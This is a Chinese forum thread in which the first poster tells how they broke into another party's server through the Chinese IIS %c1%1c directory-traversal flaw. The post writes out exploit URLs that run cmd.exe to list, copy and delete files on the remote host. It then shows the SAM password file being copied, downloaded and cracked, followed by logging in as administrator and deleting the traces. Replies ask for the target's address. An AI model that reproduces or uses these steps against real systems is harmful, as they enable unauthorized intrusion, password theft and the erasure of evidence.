作者
|
标题: 我攻破某主机的详细过程!(供大家参考)
|
freebird
未注册
|
| |
近来安全类技术网站提得最多的技术漏洞莫过于 %c1%1c 的问题。 c1 1c,中文简体里面没有这种字,照正常的情况根据内码转换文件 \winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中 c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路 径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞 从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0 +SP1,好像台湾繁体中文也受此漏洞影响。 执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32 /cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,执行: http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c +copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制, 执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/ cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。 随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的: 获得Administrator权限。 执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/ cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\ 把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._ 将sam._文件下载到本地,执行: http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c +del%20c:\inetpub\wwwroot\sam._清除痕迹。 在本机执行:C:>expand sam._ sam 启动l0phtcrack 2.5,Import Sam File... 导入sam文件,Open Wordlist File... 打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个 觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏, 网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin 扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$ 123456 /user:asdfghjk 成功联上对方主机,大功告成!窜到存放日志的目录: winnt\system32\logfiles 看了看,呵呵!写个E_mail给主机的网管说明了漏洞情况^^
| |
IP: 已记录
|
|
|
xinzhihuoyan
未注册
|
| |
把网址写出来,大家分享一下嘛!呵呵 ------------------ 我轻轻地走,正如我轻轻的来。
| |
IP: 已记录
|
|
|
密码
未注册
|
| |
只需要在IE地址里输入就可以了吗?
| |
IP: 已记录
|
|
|
DevilDragon
未注册
|
| |
不会吧,都什么年代了,还有人用这个漏洞。
| |
IP: 已记录
|
|
|